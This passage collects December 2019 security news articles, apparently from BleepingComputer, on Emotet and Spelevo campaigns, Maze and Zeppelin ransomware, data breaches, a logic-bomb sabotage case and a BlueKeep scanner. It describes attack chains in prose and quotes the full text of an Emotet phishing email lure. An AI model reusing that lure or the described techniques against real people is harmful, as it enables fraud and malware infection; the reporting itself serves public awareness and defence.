"We detected this fraud and promptly alerted the authorities. We recouped the funds and we're pleased this matter is resolved," a Google spokesperson told Bleeping Computer after Rimasauskas plead guilty in March, confirming that the company was targeted in Rimasauskas' BEC attacks.

The FBI said in a BEC public service announcement issued from September that victim complaints related to 166,349 domestic and international incidents were received between June 2016 and July 2019, revealing a total exposed dollar loss of more than $26 billion.

In July, the Financial Crimes Enforcement Network (FinCEN) also issued a report stating that BEC SAR (short for suspicious activity reports) filings increased from a $110 million monthly average during 2016 to more than $301 million per month in 2018.


Exploit Kit Starts Pushing Malware Via Fake Adult Sites
21.12.2019
Bleepingcomputer  Exploit  Virus

Spelevo exploit kit's operators have recently added a new infection vector as part of their attacks, attempting to social engineer potential targets into downloading and executing addition malware payloads from decoy adult sites.

This exploit kit was initially spotted by security researcher Kafeine back in early March 2019 and it has been used as a delivery platform for the infamous IceD and Dridex banking trojans as Cisco Talos found in June, and to drop Maze Ransomware payloads as researcher nao_sec discovered.

While normally exploit kits will only redirect victims to a landing page using a traffic direct system (TDS) and hit them with an exploit designed to abuse vulnerable apps on their computer, this time the attackers behind Spelevo EK decided to include a new social engineering tactic as a backup infection vector.

Spelevo infection chain
Spelevo infection chain (Malwarebytes)
"Recently, we captured an unusual change with the Spelevo exploit kit where, after an attempt to trigger vulnerabilities in Internet Explorer and Flash Player, users were immediately redirected to a decoy adult site," Malwarebytes security researcher Jérôme Segura said.

After failing to exploit any of the Internet Explorer and Flash Player it targets to infect the victims' devices with the Ursnif (aka Gozi) banking Trojan, Spelevo EK will automatically redirect the targets to a decoy adult site where they will be asked to download and install a video code to play the videos.

By adopting this new social engineering tactic, the attackers will still have a chance to drop additional malware payloads, Qbot banking Trojans in this case, even when the exploit kit fails to lead to successful infection.

"Based on our telemetry, there are a few campaigns run by threat actors converting traffic to adult sites into malware loads," Segura adds. "In one campaign, we saw a malvertising attack on a site that draws close to 50 million visitors a month."

Before these recent campaigns, Spelevo EK would also redirect victims post-exploitation but, instead of decoy adult sites, it would deliver the victims to google.com after a 10-second delay.

Spelevo redirecting to decoy site
Spelevo redirecting to decoy site (Malwarebytes)
Once they land on the fake adult website, the targets will be asked to download the fake video code which once downloaded and executed will launch a Qbot banking Trojan instance as already mentioned.

"Downloading video codecs to view media used to be fairly common back in the day, but isn’t really the case anymore," Segura explains. "Yet, this kind of trick still works quite well and is an alternative method to compromise users."

This new tactic adopted by Spelevo EK's operators increases the number of infection vectors used in their campaigns hence making them more effective in the long run.

Decoy adult site pushing fake video codec
Decoy adult site pushing fake video codec (Malwarebytes)
Other exploit kits have also turned to social engineering to improve their "hit rate" in the past, with Magnitude EK and Disdain EK adopting this additional attack tactic in 2017 via fake Windows Defender and Flash Player alerts.

Fallout EK also switched to social engineering in 2018, displaying fake antivirus and Flash Player prompts that would attempt to infect targets from the government, telecom, and healthcare sectors that had fully patched machines.


Emotet Malware Uses Greta Thunberg Demonstration Invites as Lure
21.12.2019
Bleepingcomputer  Virus

Emotet has started a new spam campaign that is banking off the popularity of environmental activist Greta Thunberg and her dedication to the climate movement. Unsuspecting users who think they are getting info about an upcoming "climate crisis" demonstration, will instead find that they have become infected with Emotet and other malware.

This new campaign was discovered by ExecuteMalware and pretends to be an invite to a new climate change demonstration by Greta Thunberg and uses email subjects such as "Demonstration 2019" or "I invite you" to entice you into opening the email. The spam even recommends that you forward the email on to your friends and family.

Greta Thunberg Malspam
Greta Thunberg Malspam
The full text of this email is:

MERRY CHRISTMAS

You can spend Christmas Eve looking for gifts for children. They will tell you Thank you only that day.
But the children will thank you all their lives if you come out for the biggest demonstration in protest against the inaction of the government in connection with the climate crisis.
Support Greta Thunberg - Time Person of the Year 2019

I invite you. Time and address are attached in the attached file.

FORWARD this letter to all colleagues, friends and relatives RIGHT NOW, until you forget!

Many thanks.
Attached to these emails is a malicious Word document attachment called "Support Greta Thunberg.doc". If a user opens this document they will be met with a prompt to click on the "Enable editing" and then "Enable content" buttons to see the demonstration information.

Malicious Word Document Attachment
Malicious Word Document Attachment
If the Enable Content button is clicked, a malicious macro will launch a PowerShell command that downloads the Emotet Trojan and executes it.

Downloaded malware
Downloaded malware
When successful, the Trojan will quietly run in the background, while using your computer to send out further spam and downloading more malware onto your computer.

As always, never open attachments from anyone without confirming over the phone that they did indeed send you the file. You should also always be cautious of enabling content or macros on any attachment you receive.

When receiving unknown documents, it is always safe to upload the attachment to VirusTotal to check for malicious macros before opening it.


Nexus Mods Game Modding Site Discloses Data Breach
21.12.2019
Bleepingcomputer  Incindent

The popular game modification site Nexus Mods has announced a security incident that may have exposed the registration information for its users.

Nexus Mods is a site where users can download modifications for games such as Skyrim, Fallout, Witcher, Dragon Age, and many more.

In order to download mods from the site, users must first register an account on the site, which has led to a user base of close to 19 million registered members.

In a security notice posted to their site today, Nexus Mods has disclosed that an unauthorized actor hacked their services on November 8th, 2019 through an exploit in their legacy codebase.

"In the very early morning of 8th November 2019 we noticed suspicious activity by a potentially malicious third party actor against our services. Using an exploit in our legacy codebase, our logs confirm that they accessed a small number of user records from the old user service."

When they discovered the breach, Nexus Mods states that they secured the affected endpoints and moved the release schedule for the next version of the site to quickly retire their legacy codebase.

Unfortunately, they can not rule out that the exploit was not used in the past to access other user data such as member's email addresses, password hashes, and salts.

Therefore, it is strongly suggested that all users change their passwords on the site, especially if you commonly reuse the same password at every site.

It is also suggested that you use a password manager to create unique passwords at every site you visit so that if your information is disclosed at a data breach, it cannot affect your accounts at other sites.

Nexus Mods warns that users should vigilant for potential phishing or credential stuffing attacks that utilize your registration email and password.

BleepingComputer has reached out to Nexus Mods with questions but had not heard back at this time.


Emotet Gang Changes Tactics Ahead of the Winter Holidays
21.12.2019
Bleepingcomputer  Virus

With the end of the year approaching fast, the authors of Emotet have made some changes that may increase their revenue for the holidays.

One of the modifications refers to the URI structure clients use to check into the command and control servers. Another change is the malware delivery method.

Checking into C2 servers
In late November, security researchers at email security company Cofense Labs noticed that Emotet code on the client side no longer used random paths based on a word list to reach the command and control (C2) server.

Introduced in early 2019, this structure was discarded in favor of a seemingly random string of at least four characters. A more careful look into this revealed that the path was "actually the key from the key/value pair in the posted form data."

Emotet client new URI structure (November 27)
The change appears to be more on the cosmetic side since it does not affect the check-in data significantly.

Cofense researchers believe this to be "a rudimentary attempt at identifying researchers who are running emulation code alone" because the check-in structure would not suffer modifications upon updating the malware code base.

Old tactic returns
Following a summer break, Emotet operators restarted activity in September delivering emails with malicious attachments. This was a shift in tactics as previously they used link-based email templates for the task.

In the latest campaigns, Emotet returned to the old habit that proved to be an efficient delivery method. The researchers say that using link-based templates again is probably an attempt to maximize victim count ahead of the winter holidays.

Emotet spam

The current campaigns take advantage of the holiday season and send out emails pretending to be from shipping companies, a theme not at all unusual this time of the year.

Another lure noticed by the researchers is an email template that uses the "Open Enrollment 2020," targeting users that still have to choose a health insurance program for 2020. However, this lure should no longer be successful as the deadline for making a decision expired on December 15 for most individuals.

As for the payload, TrickBot remains the main malware in recent campaigns. The researchers say they observed "heavy distribution," which could indicate one last effort to make money before the winter break.

According to past observations, Emotet distribution has its periods of inactivity which typically coincide with holiday seasons. In 2019, spam campaigns from this botnet started on January 13 and died towards the end of May.

Towards the end of August, Emotet's C2 servers activated once again and spam campaigns started in mid-September.


Vivaldi Now Impersonates Google Chrome to Avoid Being Blocked
21.12.2019
Bleepingcomputer  Security

With today's release of the new Vivaldi 2.10, the browser will impersonate Google Chrome when visiting certain sites. It does this to prevent the browser from being blocked based on its user agent.

Even though Vivaldi is a Chromium-based browser and should be supported at every site that supports Chrome, many sites will block the browser based on its user agent.

A user agent is a string that is sent to a site to let it know the name and the version of the browser being used. Normally when browsing the web, Vivaldi will send the site a user agent that contains its name as seen below.

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36 Vivaldi/2.10.1745.18
Certain sites that detect the 'Vivaldi' string in the user agent will block the site and state that it is not supported. These sites will then recommend Google Chrome, which is silly as both browsers use the same HTML rendering engine.

Vivaldi blocked at a site
Vivaldi blocked at a site
To Vivaldi CEO Jon von Tetzchner, the browser's name in the user agent is a source of pride. Unfortunately, he feels that sites are blocking the browser for competitive reasons and hurting Vivaldi's users. This change will prevent that going forward.

“The primary reason to show Vivaldi in the user agent is a level of pride. That pride, however, is hurting us, as our competitors and others are using this to block us from their services. That is why with today’s update, we’ve drawn a line in the sand so that you can browse more websites without a glitch,” Tetzchner stated in today's announcement.

Due to this, with the Vivaldi 2.10 update, the browser will now switch from its normal Vivaldi user agent to Google Chrome's user agent shown below.

Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.94 Safari/537.36
Unfortunately, other browsers have had to perform similar techniques in order to avoid web site blocks based on user agents.

The new Chromium-based Microsoft Edge also uses a similar method to avoid being blocked even though it too uses the same Blink rendering engine as Chrome.

To get past this, Edge also had to impersonate other browsers at certain sites in order for these sites to work properly.


Canadian Insurance Firm Hit By Maze Ransomware, Denies Data Theft
21.12.2019
Bleepingcomputer  Ransomware

An insurance and financial services company based out of Manitoba, Canada is the latest victim of the Maze Ransomware with allegedly 245 computers encrypted during a cyberattack in October.

The victim, Andrew Agencies. is a full-service insurance company with 125 employees and 18 locations based out of Manitoba, Saskatchewan, and Alberta, Canada.

According to emails sent to BleepingComputer from the operators of the Maze Ransomware, Andrew Agencies was attacked on October 21st, 2019 when the attackers breached their network and encrypted 245 computers.

As "proof" of the attack, Maze sent BleepingComputer a list of 245 encrypted computers, their IP addresses, computer names, and sizes of the data encrypted by the ransomware. Based on the encrypted sizes listed in this proof, the Maze Ransomware states they have encrypted a total of 63 terabytes of data.

The operators have also released a text file containing a list of 876 user names and hashed passwords for users on the network.

Maze told BleepingComputer that the ransom amount was $1.1 million, or 150 bitcoins, at the time of the attack and that Andrew Agencies was originally in communication with them, but then stopped responding.

"They are really good canadian guys, but they have disappeared. They came up to decision that they should buy decryptor and asked us for time as they are collecting money," the Maze operators told BleepingComputer via email.

Maze stated that their deadline for paying the ransom under threat of the company's data being published was at the end of November. While the data has not been publicly released as of yet, Maze is known for following through with these threats as seen by Maze's attack on Allied Universal.

Dave Schioler, the Executive Vice President & General Counsel for Andrew Agencies, confirmed that they had been in communication with the attackers while conducting an investigation.

In a statement released today, Schioler states the company has chosen not to pay the ransom and that there is no evidence that any sensitive personal information or data has been stolen.

"At this time, Andrew Agencies can confirm that it has recently dealt with a security breach incident involving ransomware. Our data and that of our customers and employees is of the utmost importance to us. We have taken this matter very seriously and have expended considerable resources in the investigation and remediation of this incident, including the use of third parties with expertise in similar incidents. We have put in place any and all steps necessary for remediation.

We also wish to emphasize that as a result of our investigation, we have uncovered no evidence of sensitive personal information or data being stolen or otherwise compromised. While we are not at liberty to share the particulars of the investigation with you, we can advise that the incident has had minimal impact on our operations. Andrew Agencies did not pay a ransom as part of the recovery effort.

We are confident with our operating status and security, and we therefore do not intend to be providing further commentary on this matter."

This statement, though, is disputed by the Maze operators who told us that they stole 1.5GB of data "about insurance customers."

No proof of these stolen documents has been shared with BleepingComputer at this time.

BleepingComputer has sent followup questions regarding the stolen data to Andrew Agencies, but have not heard back at this time.

Ransomware attacks are becoming data breaches
The actors behind the Maze Ransomware have upped the ante when it comes to ransomware attacks by releasing stolen data if a ransom has not been paid.

As we have said numerous times, it is not unknown for attackers, including ransomware actors, to steal data or snoop through a company's files before encrypting them.

Maze, though, has been the only threat group that has released files when a victim chooses not to pay a ransom.

This has led to another high profile ransomware group called REvil, or Sodinokibi, to follow in their footsteps.

When ransomware actors release a company's data, this attack becomes a data breach that will require government and customer notifications and the potential of lawsuits for exposed data.


Siemens Contractor Jailed for Sabotage With Logic Bombs
21.12.2019
Bleepingcomputer  Hacking

Former Siemens contract employee David Tinley was sentenced to six months in prison for sabotaging his employer over a span of roughly two years using logic bombs planted in company spreadsheets.

The end goal of his efforts was to cause Siemens to ask for his services at the firm's Monroeville, PA location to repair the malfunctioning software.

62-year old Tinley pleaded guilty to the intentional damage to a protected computer charge in July 2019 and the conviction also came with an additional two-year term of supervised release and a $7,500 fine.

Tinley faced a maximum total sentence of 10 years in prison for the charges, a maximum fine of $250,000, and a maximum term of supervised release of three years according to court documents.

The plea agreement stipulated a total loss amount of $42,262.50 according to the United States Sentencing Guidelines.

Siemens contract employee sentenced for intentionally inserting logic bombs into computer programs he designed, causing company to hire him to fix the malfunctions https://t.co/F1eKipSipC

— WDPAnews (@WDPAnews) December 17, 2019
The spreadsheet logic bombs
Tinley planted logic bombs designed to trigger automatically after a set time and randomly crash a series of spreadsheets he designed to automatically calculate customer order cost estimates and workflow according to a Law360 report.

While his spreadsheets worked without flaw for years, starting in 2014 they suddenly began randomly crashing and glitching because of the logic bombs he inserted within the password-protected code.

This prompted Siemens to ask Tinley to fix the issue for a set fee. Each his services were required, he would go in, edit the spreadsheets code and modify the date when they would again start crashing according to Assistant U.S. Attorney Shardul S. Desai.

According to information presented to the court, from in and around 2014 and continuing until on or about May 13, 2016, Tinley intentionally inserted logic bombs into computer programs that he designed for Siemens Corporation. The logic bombs ensured that the programs would malfunction after the expiration of a certain date. As a result, Siemens was unaware of the cause of the malfunction and required Tinley to fix these malfunctions. - DoJ press release

While this worked for about two years until May 13, 2016, Tinley's scheme was discovered when he was out of town and he had to give his password to Siemens' employees because of a time-sensitive deadline that required the spreadsheets to work.

This is not the first instance of logic bombs being planted on computers documented by the U.S. DoJ as shown by previous instances of employees being sentenced, charged, pleading guilty of inserting such software implements on public or their companies' systems [1, 2, 3, 4, 5]


Honda Exposes 26,000 Records of North American Customers
21.12.2019
Bleepingcomputer  Incindent

Automotive giant Honda exposed roughly 26,000 vehicle owner records containing personally identifiable information (PII) of North American customers after misconfiguring an Elasticsearch cluster on October 21, 2019.

Honda's security team in Japan promptly secured the publicly accessible server within just a few hours after being contacted by Security Discovery researcher Bob Diachenko on December 12.

The researcher discovered the database on December 11 and was able to access the data without authentication after the BinaryEdge Internet-connected device search engine indexed the database on December 4.

Exposed Honda vehicle owner data
The database records included the customers' full names, email addresses, phone numbers, mailing address, vehicle make and model, vehicle VINs, agreement ID, and various service information on their Honda vehicles.

"The database in question is a data logging and monitoring server for telematics services for North America covering the process for new customer enrollment as well as internal logs," Honda told Diachenko in a statement.

"As of today, Honda estimates the number of unique consumer-related records in this database to be around 26,000."

The company also said that none of its North American customers' financial info, credit card data, or credentials were exposed in the incident.

While the company reacted very promptly after being informed that the misconfigured Elasticsearch cluster was publicly accessible on the Internet, Diachenko says that their week-long public exposure "would have allowed malicious parties ample time to copy the data for their own purposes if they found it."

Honda is continuing to perform due diligence, and if it is determined that data was compromised, we will take appropriate actions in accordance with relevant laws and regulations. We will continue to work on proactive security measures to prevent similar incidents in the future. - Honda

"The information in this database could be valuable to criminals if they managed to find it before the server was shut down," the researcher adds. "It is best to assume the worst and take steps to protect yourself if you think you might be impacted."

The Honda customers' info might be used in highly targeted phishing attacks in the future if the information was leaked during the week the database was exposed.

Such attacks could be used by threat actors to steal sensitive information like user credentials and financial data or to infect their targets' computers with malware if the phishing messages also deliver malicious payloads.

[NEW REPORT] Honda exposes vehicle owner records - again (names, emails, VIN, mailing addresses and service records). Company acted promptly and secured the server within hours after initial notification. Read more: https://t.co/MeHDkxLSrc

— Bob Diachenko (@MayhemDayOne) December 18, 2019
Previous Honda data exposure and breach incidents
Honda was involved in similar incidents in the past, with the most recent one from July 2019 also involving a publicly accessible ElasticSearch database that exposed 134 million documents containing 40 GB worth of info on approximately 300,000 Honda employees around the globe.

As part of that breach, Honda's CEO info was also exposed with the open database revealing his full name, account name, email, and last login date, as well as info related to his work computer, including "MAC address, which Windows KB/patches had been applied, OS, OS version, endpoint security status, IP, and device type."

In 2018 Honda India also left customers' PII data on two public Amazon S3 buckets exposed to anyone with an Internet connection and the expertise needed to find it for at least three months.

The records contained customer names, genders, phone numbers, email addresses, and account passwords, as well as car VIN information, and the buckets were taken offline after repeated attempts to get in touch with the company spanning almost two weeks.

Further back, in 2010, Honda warned its customers of a hacking incident involving an e-mail list that gave the attackers access to 2.2 million Honda vehicle owners' names, e-mail addresses, and vehicle VINs, as well as to 2.7 million Acura customers' e-mail addresses after gaining access to a second list.

How to secure an ElasticSearch cluster
Even though Elastic Stack's core security features are free since May per an announcement made by Elastic NV, publicly-accessible and unsecured ElasticSearch clusters are constantly being spotted by security researchers while scouring the web for unprotected databases.

"This means that users can now encrypt network traffic, create and manage users, define roles that protect index and cluster level access, and fully secure Kibana with Spaces," ElasticSearch's developers say.

Elastisearch servers should ​​​​only be accessible on the company's local network to make sure that only the database's owners can access them as ElasticSearch's dev team explained back in December 2013.

Elastic NV also recommends database admins to secure their ElasticSearch stack by "encrypting communications, role-based access control, IP filtering, and auditing," by properly configuring the cluster before deploying it, and by setting up passwords for the servers' built-in users.

 


Microsoft Security Essentials To Get Updates After Windows 7 EoS
21.12.2019
Bleepingcomputer  OS

Microsoft Security Essentials (MSE) will continue to receive definition updates for new malware after Windows 7 reaches End of Support, even though a Microsoft support bulletin states otherwise.

In Microsoft's FAQ about Extended Security Updates for Windows 7 it states that after Windows 7 reaches EoS, MSE will no longer protect a Windows 7 computer.

Will Microsoft Security Essentials (MSE) continue to protect my computer after the end of support?

No, your Windows 7 computer is not protected by MSE after January 14, 2020. MSE is unique to Windows 7 and follows the same lifecycle dates for support. Learn more about MSE.

This was concerning for those users who continue to use MSE on Windows 7 as it meant they would have to get a new antivirus software to stay protected.

In a Microsoft AMA about Windows 7 hosted on the Microsoft Community Forums yesterday, Woody Leonhard asked if it was true that MSE would no longer receive malware signatures after the January 14th, 2020, EoS date.

Microsoft Employee Mike Cure said that MSE would still get signature updates after January 14th, but shared information from a Windows 7 End of Support FAQ that explains that the Microsoft Security Essentials program will no longer receive updates.

Microsoft post in AMA
Microsoft post in AMA
While this is surely good news for MSE users on Windows 7, it still does not mean you should continue to use Windows 7 or Microsoft Security Essentials for that matter.

Without a subscription to Windows 7 extended security updates, using the unsupported operating system will open users to vulnerabilities that will no longer be fixed. Furthermore, it is not uncommon for vulnerabilities or bypass methods to be discovered in antivirus software.

Therefore, even if you are willing to risk being affected by new vulnerabilities in Windows 7, it is still possible that malware distributors will come up with methods that bypass detections in Microsoft Security Essentials.

If you are running Windows 7, it is strongly suggested you upgrade your computer to Windows 10, which can still be done for free.


Verizon Fios Internet is Having an Outage, Change DNS to Fix
20.12.2019
Bleepingcomputer  Vulnerebility

Verizon Fios is currently having a network-wide DNS outage that is causing users to not be able to connect to websites, retrieve email, or play online games.

BleepingComputer spoke to a Verizon Fios support rep and was told that this outage is network-wide and is being caused a problem with their DNS servers.

According to DownDetector, this outage is affecting almost all of the United State, especially on the east coast.


If you are experiencing issues with the Fios Internet, you can resolve the outage by changing your computer's DNS settings temporarily to a non-Verizon DNS server.

We recommend either using Cloudflare's DNS server with the IP address of 1.1.1.1 or use the Google DNS server with the IP address 8.8.8.8.

This is a developing story.

Change your DNS servers
If you are using Windows 10, you can change DNS servers by following these steps:

Click the Start button and type Network Status. When the Network Status result appears, click on it to open the screen.
At the Network Status screen, click on Change adapter options.
Find your Ethernet or WiFi connection and right-click on it and select Properties.
Under "This connection uses the following items:", double-click on the Internet Protocol Version 4 (TCP/IP) item to open it.
Select Use the following DNS server addresses and enter either 1.1.1.1 (Cloudflare) or 8.8.8.8 (Google) as your preferred DNS server.
Press OK and then OK again and your Internet should work again.
For Macs, you can follow these steps.


Attackers Posing as German Authorities Distribute Emotet Malware
20.12.2019
Bleepingcomputer  BigBrothers  Virus

Attackers Posing as German Authorities Distribute Emotet Malware

An active malspam campaign is distributing Emotet banking Trojan payloads via emails camouflaged to look like messages delivered by several German federal authorities warns the BSI, Germany's federal cybersecurity agency.

The attackers behind this malicious campaign have already successfully infected a number of federal administration authorities during the last few days according to reports cited by the BSI (also known as the Federal Office for Security in Information Technology — Bundesamt für Sicherheit in der Informationstechnik).

"Spam emails with malicious attachments or links are currently being sent on behalf of several federal agencies," the BSI says.

"The Federal Office for Information Security ( BSI ) calls for special caution and warns against opening these emails and links."

Emotet malspam sent as replies in previous conversations
Besides these already confirmed Emotet infections, the BSI also suspects that there are more victims. The agency is also actively working with all concerned German authorities to address this threat.

"These are primary infections that lead to further spam emails being sent on behalf of those affected," the BSI adds.

"The authorities have so far not had any harmful effects because the infections have been isolated and cleaned up."

The Emotet spam arrives in the targets' inboxes as replies to already existing email conversations as part of an effort to make them like authentic messages from German federal agencies.

BSI warns against malicious SPAM e-mails delivering Emotet payloads

BSI warns against malicious SPAM e-mails delivering Emotet payloads

The BSI recommends checking the emails' sender name and not relying only on the name displayed by the email client. Potential targets should also be aware that such spam emails might also feature various inconsistencies such as misspelled words and out of place formatting.

Users should also make sure not to enable macros when asked by documents arriving via a suspicious email and immediately notify their organization's security team if they opened such an attachment accidentally or on purpose.

"If in doubt, you should clarify by telephone with the alleged sender whether an email was actually sent by the sender," the BSI further recommends.

The ongoing Emotet threat
Emotet is a banking trojan first detected in 2014 that evolved into a dangerous botnet over time, a botnet used for dropping other malware payloads like the Trickbot banking Trojan known for delivering Ryuk ransomware on compromised machines.

Security researchers say that the Emotet botnet is being operated by a threat actor ProofPoint tracks as TA542 and known as Mummy Spider by CrowdStrike. The group is known for "renting" the Emotet botnet to other actors like the group behind TrickBot.

After a short hiatus starting with the beginning of June, the Emotet command and control (C2) servers suddenly resumed their activity and started delivering malware payloads again on August 22

Cofense told BleepingComputer at the time that Emotet malspam was coming from 3,362 compromised senders, while the total count of unique domains used in these attacks reached 1,875 covering more than 400 TLDs.

The Emotet botnet arose from the grave yesterday and began serving up new binaries. We noticed that the C2 servers began delivering responses to POST requests around 3PM EST on Aug 21. Stay vigilant and keep an eye out for any updates as we monitor for any changes.

— Cofense Labs (@CofenseLabs) August 22, 2019
After less than a month since it got revived, on September 16, the Emotet botnet started spraying malicious emails around the globe.

Malspam distributing Emotet payloads was discovered as part of attacks directed at a wide range of targets including individuals, business, and government entities from the U.S., Germany, and the United Kingdom.

The Australian Signals Directorate’s Australian Cyber Security Centre provides technical advice on how to defend against Emotet attacks as part of an Emotet advisory published in early November.


ScreenConnect MSP Software Used to Install Zeppelin Ransomware
20.12.2019
Bleepingcomputer  Ransomware

Threat actors are utilizing the ScreenConnect (now called ConnectWise Control) MSP remote management software to compromise a network, steal data, and install the Zeppelin Ransomware on compromised computers.

ConnectWise Control is a remote management software commonly used by MSPs and IT professionals in order to gain access to a remote computer to provide support.

To remotely manage an endpoint workstation, technicians will use the software to create agents that are then installed on the computers they wish to manage. Once the agent is up and running, the computer will appear in the ConnectWise Control Site management software as shown below, where it can then be taken over.

ConnectWise Control Site showing agents
ConnectWise Control Site showing agents
Abusing ConnectWise ScreenConnect
In a new report shared with BleepingComputer, security software firm Morphisec explains how they discovered ScreenConnect being abused by attackers to install the Zeppelin Ransomware and other malware.

"The Zeppelin ransomware was delivered through ScreenConnect, a central web application remote desktop control tool that is designed to allow IT admins to manage remote computers and remotely execute commands on a user’s computer."

Attackers had compromised the network of a large real estate company in the USA and installed the ScreenConnect client on a compromised workstation. Once installed the client named ScreenConnect.ClientService.exe would quietly run in the background while waiting for a remote management connection.

ScreenConnect waiting for connection
ScreenConnect waiting for connection
The attacker then used the ScreenConnect software to execute a variety of commands that exfiltrate data from backup systems and download malware, post-exploitation tools, and data-stealing Trojans in order to further compromise the network.

In a conversation with Morphisec's Michael Gorelik, BleepingComputer was told that their investigations showed that the actor first attempted to exfiltrate data, steal backup information, and then when finished, installed the Zeppelin Ransomware as a final payload.

"Following additional investigation of the source of infection, we also identified multiple commands specifically targeting Windows data servers. In addition, we discovered a source of data that indicates a data breach, which is currently under investigation by authorities. Of note, we found the actor first tries to exfiltrate information, stealing the backup information and only then propagates the ransomware across the different infected machines"

One command discovered utilizes PowerShell to download and execute a variety of programs on the compromised computer. These programs include the Vidar information-stealing Trojan, bankers, PS2EXE, and Cobalt Strike beacons.

Downloading Vidar and Post-Exploitation Tools
Downloading Vidar and Post-Exploitation Tools
The above software is most likely used to exfiltrate data, steal passwords, and further compromise other computers and servers on the network.

After the data exfiltration and network compromise phase were finished, the actors performed a final attack of installing the Zeppelin Ransomware.

First, a CMD script was executed that prepares the computer for the installation of the ransomware. It does this by installing a Registry file that configures the public encryption key to be used by the ransomware and then attempts to disable Windows Defender by turning off various security features.

Disable Windows Defender before installing Zeppelin Ransomware

Disable Windows Defender before installing Zeppelin Ransomware
Disabling Windows Defender before installing Zeppelin Ransomware
Finally, the attacker would execute a PowerShell command that downloads a file named oxfordnew.exe or oxford.exe to the C:\Windows\Temp folder and then execute it. This file is the Zeppelin Ransomware.

Remote PowerShell script that is executed
Remote PowerShell script that is executed
What makes this particular case interesting is that the attacker deployed the ScreenConnect remote management software themselves.

When we normally cover ransomware attacks that utilize MSP software, it is an MSP that is hacked and the actors using their configured remote management software to infect the MSP's downstream clients.

In this particular case, the threat actors themselves are deploying the ScreenConnect software in order to secure a foothold on the network to further compromise other endpoints on the computer.

More ransomware stealing data
It also show a continuing and concerning trend where ransomware actors are now stealing data before performing a final encryption of ransomware.

While we have known for a while that this has been occurring, both the Maze Ransomware and the REvil ransomware variants are now using stolen data as leverage to get victims to pay.

As this becomes more common in ransomware attacks, companies will now need to treat these attacks as data breaches.

 


FBI Warns of Risks Behind Using Free WiFi While Traveling
20.12.2019
Bleepingcomputer  BigBrothers
FBI Warns of Risks Behind Using Free WiFi While Traveling

The U.S. Federal Bureau of Investigation recommends travelers to avoid connecting their phone, tablet, or computer to free wireless hotspots while traveling during the holiday season.

"This is an open invitation for bad actors to access your device," the FBI Portland field office said in its weekly Tech Tuesday press release.

"They then can load malware, steal your passwords and PINs, or even take remote control of your contacts and camera."

Oversharing and location services are verboten
If there is no other choice and you must use a hotel's or airport's public WiFi network, you should make sure that you go through the provider's connection steps to steer clear of any hotspots set up by malicious actors.

When you must use an unsecured free hotspot, you should keep in mind that connecting to any of your accounts could allow hackers to snoop around on the same network to steal your user credentials or your banking info.

As an even simpler measure to protect your sensitive info while connected to a public WiFi, you can use a virtual private network (VPN) service that encrypts your data making it impossible for attackers to snoop around your Internet traffic.

A Virtual Private Network, or VPN, is a simple way to keep your communications & internet usage more secure, even when you're using public Wi-Fi networks. Protect your voice & your information: https://t.co/o686GUMukR

— FBI (@FBI) September 18, 2018
The agency also recommends disabling location services on your devices and consider not sharing any info on your travels. This prevents criminals from getting a heads up that you're not at home and gives them all the info they need to go about their business uninterrupted.

If you have guests staying at your home, consider having them use a separate (guest) network if your router supports it, as a precaution against potentially vulnerable devices connecting to your regular local network.

Smart TVs and IoT devices also need to be secured
The FBI also recommended making sure that your Internet of Things (IoT) devices and smart TVs are properly configured and secured against potential attackers, not exposing your other devices to attacks.

"Unsecured devices can allow hackers a path into your router, giving the bad guy access to everything else on your home network that you thought was secure," the FBI Portland Office said at the time.

To protect your data from hackers attempting to compromise your IoT devices you should secure your home network by segregating them on a separate network, as well as changing the default password with unique and hard to crack passwords.

FBI's Portland field office also advised smart TV owners to protect themselves against potential snooping by covering their devices' cameras with black tape and by turning off "the microphones, cameras, and collection of personal information if possible."


New BlueKeep Scanner Lets You Find Vulnerable Windows PCs
20.12.2019
Bleepingcomputer  Safety

A new scanning tool is now available for checking if your computer is vulnerable to the BlueKeep security issue in Windows Remote Desktop Services.

Despite Microsoft rolling out a patch in mid-May, there are tens of thousands of devices exposing a Remote Desktop Protocol (RDP) service to the public internet.

Unpatched systems still at risk
BlueKeep (CVE-2019-0708) is a vulnerability that leads to remote code execution and could be leveraged to spread malware across connected systems without any interaction from the user.

It affects Windows 7, Windows Server 2008 R2, and Windows Server 2008 and is serious enough to warrant repeated warnings from Microsoft about the severity of the flaw and the strong recommendation to apply the patch.

The security community cautioned users and companies early on that leaving the issue unattended could have brutal consequences. So did the U.S. Government after exploiting the bug and achieving remote code execution.

After exploit modules starting cropping up and enough information became public, cybercriminals started to exploit BlueKeep in the wild. The payload exploited vulnerable systems en-masse for cryptocurrency mining but it was not a worm that would could have brought the attack to WannaCry’s destruction level.

The danger is not over, though. There are plenty of vulnerable systems exposed on the web and cybercriminals are not likely to spare them.

Check yourself
In the U.S. alone, there are at least 45,000 systems with RDP exposed on the web at the time of writing. More than 20,000 hosts vulnerable to BlueKeep are in South Korea, and over 16,000 in Brazil.

And this is only what is is directly connected to the public internet. Many unpatched systems, though, may lurk on company networks and are not visible from the outside. In case of a BlueKeep epidemic, these are are what cybercriminals are after. From one system, the infection could reach other computers on the network.

Slovakian cybersecurity company ESET released a tool that checks if your computer is vulnerable to BlueKeep or out of this harm’s way. Their BlueKeep vulnerability scanner can be downloaded from here.

On systems where the flaw can be exploited, the utility launches a web page that provides the appropriate patch from Microsoft. This release has no command-line arguments and deploys like any other executable.


ESET notes that “this is a single-purpose tool intended for personal use and is not intended to be deployed for mass use in an automated environment.”

At least two penetration tools include a BlueKeep exploit module, so it is definitely part of security tests. As such, the company recommends businesses to remove vulnerable device from their networks.

Other scanners exist on the market. Robert Graham created one, the NCC Group did the same with this tool. Even criminals have included their version in malware designed for cryptomining, indicating that they are ready to exploit the BlueKeep flaw to reach their goals.

 


Industrial Cyber-Espionage Campaign Targets Hundreds of Companies
20.12.2019
Bleepingcomputer  CyberSpy

Hundreds of industrial companies are currently the targets of cyber-espionage activity from an advanced threat actor. The adversary uses a new version of an older info-stealer to extract sensitive data and files.

The attacker uses spear-phishing emails with malicious attachments often disguised as PDF files. Separ is the malware of choice, which steals login data from browsers and email clients, also hunting for various types of documents and images.

Victims in multiple countries
